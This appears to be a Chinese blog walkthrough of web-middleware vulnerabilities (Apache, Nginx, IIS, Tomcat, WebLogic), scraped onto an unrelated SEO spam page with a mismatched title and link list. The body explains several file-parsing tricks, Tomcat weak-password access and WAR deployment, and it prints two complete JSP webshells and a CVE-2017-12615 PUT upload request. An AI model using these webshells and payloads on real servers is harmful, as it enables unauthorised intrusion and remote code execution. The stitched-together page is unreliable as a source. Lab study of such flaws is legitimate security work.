当前位置: 首页 > news >正文

如何用html做网站头像wordpress最好的编辑器下载地址

如何用html做网站头像,wordpress最好的编辑器下载地址,自己的电脑建网站,网站开发上次好像记得讲过了框架漏洞#xff0c;#xff08;weblogic不是#xff09;那么#xff0c;今天我们就来讲一些中间件的漏洞 1.Apache解析漏洞 众所周知#xff0c;Apache是一个非常出名的中间件#xff0c;本来呢#xff0c;他是不存在漏洞的#xff0c;但是如果用…上次好像记得讲过了框架漏洞weblogic不是那么今天我们就来讲一些中间件的漏洞 1.Apache解析漏洞 众所周知Apache是一个非常出名的中间件本来呢他是不存在漏洞的但是如果用户进行了错误的配置的话就会导致漏洞的产生 1.Handler错误配置 Apache默认一个文件可以有多个以点分隔的后缀,当右边的后缀无法识别(不在mime.types内),则继续向左识别 ---这是apache的解析规则 本来呢apache服务器是不会解析php文件的但是如果一些运维人员想要让他解析的话那么就会加上这么一句话 AddType application/x­httpd­php .php 它的作用也是为了让 apache 把 php 文件交给 php_module 解析 , 但是注意到它与SetHandler: 它的 后缀不是用正则去匹配的 。所以, 在文件名的任何位置匹配到php后缀,它都会php_module解析。 所以当我们上传一个这样的文件的时候就能被成功的解析 那么总结一下这个漏洞的条件 有人设置了 AddType application/x­httpd­php .php这个handler没有正则匹配只能是php php3  php5这样的结尾有了上述的错误配置之后结合上apache的从右往左解析的特点找不到就继续找导致到了 .php.eweqdd 这样的文件结尾能被解析成php文件 2.CVE-2017-15715 Apache HTTPD 是一款 HTTP 服务器它可以通过 mod_php 来运行 PHP 网页。其 2.4.0~2.4.29 版本中存在一个解析 漏洞在解析PHP 时 1.php\x0a 将被按照 PHP 后缀进行解析导致绕过一些服务器的安全策略。 漏洞的原理就在这里  我们众所周知 $是正则匹配以什么结尾,反手用mysql来演示一下 漏洞是怎么产生的呢 首先得知道一个东西 $ 符号 : 匹配输入字符串的结尾位置。如果设置了 RegExp 对象的 Multiline 属性则 $ 也匹配 \n 或 \r 。 假设有这样的一个php源代码 ?php if(isset($_FILES[file])) { $name basename($_POST[name]); $ext pathinfo($name,PATHINFO_EXTENSION); if(in_array($ext, [php, php3, php4, php5, phtml, pht])) { exit(bad file); } move_uploaded_file($_FILES[file][tmp_name], ./ . $name); } else { ? 很明显这个是用来判断上传的类型的问题就在于它的 $name是用的POST来接受的 当我们传入的文件后缀为 .php\n的时候POST并不会去掉我们的\n并且传入之后我们的文件格式 .php\n还会被匹配成.php  所以这个能利用起来还是很苛刻的 还是来捋一下思路 首先网站的regexp设置了multiline的属性而且在http.conf里面用 $来匹配php结尾然后就是获取文件的格式不能直接 $_FILES[FILE][name]来接受我们的文件格式必须要有一个单独的格式去接受我们的文件格式最后就是要去包里面将文件的后缀名字加上一个 %0a 注意哦我们这里的蚁剑连接也是要接的%0a 这个利用起来还真是好难呢 2.Nginx解析漏洞 PHP 配置文件中有一个参数是 cgi.fix_pathinfo 如果参数 cgi.fix_pathinfo1 则产生该漏洞 这个还是比较好利用的复现过程如下 如何我的www目录下有一个shell.jpg文件并且里面写的是一句话的木马当我访问这样的一个url的时候就会产生漏洞 http://127.0.0.1/shell.jpg/i_want_to_be_a_blue_team_member.php 哈哈哈后面那些是我自己的创造但是不重要在开启了cgi.fix_pathinfo这个函数的时候解析就变成了以下的规则 先去找一下********.php(就是我最后的那个php文件)肯定是找不到的然后以PHP的规则向前面解析当碰到shell.jpg的时候就会把他当成php来解析 所以漏洞就是这样子产生的 所以总结 只要开启了cgi.fix_pathinfo为1那么这个漏洞将会存在 3.IIS解析漏洞 1.IIS7.X解析漏洞 这个漏洞和上面的Nginx的解析漏洞有点像 也是需要对应的cgi.;x_pathinfo1 有了上面的前提之后在某文件路径后添加/.php会将该文件解析成php文件 2.IIS6.0解析漏洞 前提也比较简单 ii6.0的服务器开启Active Server Pages服务拓展 那么我们这样的格式就会直接忽略 ; 后面的内容直接解析 ; 前面的内容 所以我们的poc就是 /shell.asp;.jpg 4.Tomcat 汤姆猫的漏洞可不少 1.弱口令 tomcat 存在管理后台进行应用部署管理且管理后台使用 HTTP 基础认证进行登录。若用户口令为弱口令攻击者 容易进行暴力破解登录后台并进行应用管理。Tomcat 支持在后台部署 war 文件可以直接将 webshell 部署到 web 目录下。 默认来说它的用户名就是默认tomcat所以如果我们遇到的话就可以去尝试一下 点击这里直接爆破就好或者你弱口令不过这个tomcat也是抽象base64编码是吧那么这样的话就可能要你自己去写一个py的脚本来换字典了 这里就直接弱口令进来了 原理 下面来看看 首先是进入docker吧 docker exec -it container_id /bin/bash 然后去对应位置查看是否存在弱口令 cd /usr/local/tomcat/conf cat tomcat-users.xml 然后就能看见配置 然后我们都进到了后台了说说怎么利用吧 看到这个部署了吗是不是和weblogic很像 那么我们就按之前的操作再来一遍 java语言直接上jsp的这里我用的冰蝎好像蚁剑对jsp的连接效果不好 老样子先找一个jsp的马然后打包成war包 然后直接部署 然后去访问shell目录下的shell.jsp 然后就被啪啪打脸了 md冰蝎连不上了反而蚁剑连上了        可能我用的这个不是冰蝎自带的吧 %!class U extends ClassLoader {U(ClassLoader c){super(c);}public Class g(byte[] b){return super.defineClass(b,0,b.length);}}public byte[] base64Decode(String str) throws Exception{try{Class clazz Class.forName(sun.misc.BASE64Decoder);return (byte[]) clazz.getMethod(decodeBuffer,String.class).invoke(clazz.newInstance(),str);}catch (Exception e){Class clazz Class.forName(java.util.Base64);Object decoder clazz.getMethod(getDecoder).invoke(null);return(byte[])decoder.getClass().getMethod(decode,String.class).invoke(decoder,str);}} % % String cls request.getParameter(cmd);if(cls ! null){new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext); } % 那么换冰蝎的马试试 % page importjava.util.*,javax.crypto.*,javax.crypto.spec.* % %! class U extends ClassLoader {U(ClassLoader c) {super(c);}public Class g(byte[] b) {return super.defineClass(b, 0, b.length);} } % % if (request.getMethod().equals(POST)) {String k e45e329feb5d925b; // 默认连接密码rebeyond的前16位md5值session.putValue(u, k);Cipher c Cipher.getInstance(AES);c.init(2, new SecretKeySpec(k.getBytes(), AES));byte[] decodedData new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine());byte[] decryptedData c.doFinal(decodedData);ClassLoader classLoader this.getClass().getClassLoader();Class loadedClass new U(classLoader).g(decryptedData);Object instance loadedClass.newInstance();// 检查实例是否与pageContext相等if (instance.equals(pageContext)) {// 执行一些特定的操作} } %我真无语了。。。。。 自己的马自己都连不上 2.CVE-2017-12615 在Tomcat配置文件设置了PUT上传方法 在 web.xml 文件可以发现默认 readonly 为 true当 readonly 设置为 false 时可以通过 PUT / DELETE 进行文件操控 受到影响的版本Apache Tomcat 7.0.0 - 7.0.79 (windows环境) Linux的话不是反正遇到tomcat就去试试 poc如下 PUT /1.jsp/ HTTP/1.1 Host: your­ip:8080 Accept: */* Accept­Language: en User­Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content­Type: application/x­www­form­urlencoded Content­Length: 5这里直接写你的webshell code 上BP冰蝎我给你最后一次机会 爬给我爬连不上蚁剑我还是爱你的 上蚁剑的 小小flag以后我只用蚁剑 但是其实到了这个步骤并不是结束了当我们看到一个Linux搭建的环境的时候 我们就要去想会不会是docker 因为要逃逸 但是可以说这个靶场做的挺不错的 挺全的就连以下两个命令也检查不出来 ls -a //看看有没有隐藏的 .docker.env这种特征性文件 cat /proc/1/groups //看看有没有docker的字样 但是最后的这一个命令就露馅了一个Linux机器非docker环境怎么可能连ifconfig都没有 5.Weblogic weblogic的话我之前讲过它的泄露密码 对于它出现过的SSRF漏洞请看我的下一篇Blog 关于SSRF的 对于反序列化其实挺多的但是原理复杂我就不细讲了这种用工具扫就是 直接用工具扫就好了 以上就是比较出名的中间件漏洞啦
http://www.pierceye.com/news/132840/

相关文章:

  • 邯郸专业做wap网站中国设计网址导航
  • 邯郸移动网站建设价格官方网站车联网是谁做
  • 哪个网站可以做高像素动图个人网站排版设计
  • 多少网站域名采用中文做一个电子商务网站在哪里做
  • 家装设计学校沈阳网站建设优化企业
  • 网站开发公司售后服务触屏端网站开发
  • 建设银行网站注销吗网页制作作品
  • 家具网站建设目的及功能定位网页游戏在哪里制作
  • 高端网站开发步骤网站设计制作如何评价
  • 漳州企业网站建设制作做发型的网站
  • 承包酒席可以做网站吗网站建设小组的运营模式
  • 保定网站建设公司哪家好酒店网站建设必要性
  • 电子商务网站建设设计报告建网站免费软件
  • 广州高端优秀网站改版设计公司网页编辑框
  • 摄影网站的需求分析wordpress英文版变成中文版
  • 网站营销公司wordpress 无效的文章类型
  • 网站一级页面标题怎么做茶网站设计素材下载
  • 网站建设费用计入什么科目淘宝网站开发店铺什么类别
  • 四川平昌县建设局网站怎么把网站维护
  • 成都教育行业网站建设工业和信息化部反诈中心发短信
  • 高端开发网站系统网页设计与制作教程课后题答案
  • 网站制作的困难与解决方案无极在线最新招聘
  • 做设计比较好的网站推荐郑州做网站企起
  • 手机版自适应网站怎么做春节网页设计素材网站
  • 中国建设教育协会网站培训中心网站建设怎么报价表
  • 网站建设与推广好做吗wordpress+模板+国外
  • 建网站免费空间哪有做logo的网站
  • 找外包做网站要多久网站导航栏条源码
  • php网站开发实践襄樊seo排名
  • 衡水住房和城乡建设局网站939网站建设